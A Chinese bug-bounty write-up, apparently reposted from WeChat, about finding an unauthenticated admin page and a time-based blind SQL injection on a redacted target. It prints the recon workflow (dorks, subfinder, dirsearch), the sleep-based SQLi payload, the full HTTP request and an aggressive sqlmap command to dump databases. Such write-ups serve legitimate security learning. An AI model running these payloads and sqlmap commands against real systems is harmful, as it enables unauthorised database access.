总计1500美刀的未授权和sql注入漏洞

admin 2023年10月20日02:19:30评论63 views字数 2099阅读6分59秒阅读模式

正文

针对某目标,使用了一下谷歌语法,以及github上面相关资源

inurl:/bug bounty
inurl:/security
inurl:security.txt
inurl:security "reward"
Bug Bounty program "reward"
inurl:/responsible disclosure
inurl:/responsible-disclosure/ reward
inurl:/responsible-disclosure/ swag
inurl:/responsible-disclosure/ bounty
responsible disclosure "reward" site:com
responsible disclosure hall of fame
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

过滤出几周或几个月前发布的。

首先使用Subfinder和HTTPX进行了子域搜索,以查看子域名的状态码,如下所示:

总计1500美刀的未授权和sql注入漏洞

发现了一个子域名xeon4.redacted.com,其响应为200,但是页面没啥东西

继续使用Waybackurl搜索接口,没发现,继续用Dirsearch来搜索,发现了adminpage接口

xeon4.redacted.com/adminpage
总计1500美刀的未授权和sql注入漏洞

这个页面有一些敏感信息,而凭借它们是可以进入到其他敏感页面的,这里就造成了敏感信息泄露

从上图中同时还发现了另外一个链接;

打开了上面的链接,页面显示了一个表单,可以在其中搜索文档,如下所示:

总计1500美刀的未授权和sql注入漏洞

做文档搜索时截获了一个请求,directform参数容易受到SQL注入攻击,通过测试负载发现了一个基于时间的SQL盲注。

payload如下:

'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z

请求如下:

POST /xxxx/repository/xxxx? HTTP/2
Host: secure.redacted.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: https://secure.redacted.com
Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
[...]

password=xxxxxx&directform=脆弱点

响应:

Sleep time 15s ‘XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR’Z
总计1500美刀的未授权和sql注入漏洞
Sleep time 20s ‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
总计1500美刀的未授权和sql注入漏洞

这很容易受到SQLI的攻击,下面使用Sqlmap,并使用以下简单命令保存上述请求

sqlmap -r request.txt -p directform — random-agent — level 5 — risk 3 — dbs — threads=10
总计1500美刀的未授权和sql注入漏洞

这个sqli价值500美刀,上面那个未授权价值1000美刀

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款



总计1500美刀的未授权和sql注入漏洞

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)




原文始发于微信公众号(迪哥讲事):总计1500美刀的未授权和sql注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月20日02:19:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   总计1500美刀的未授权和sql注入漏洞http://cn-sec.com/archives/2124982.html

发表评论

匿名网友 填写信息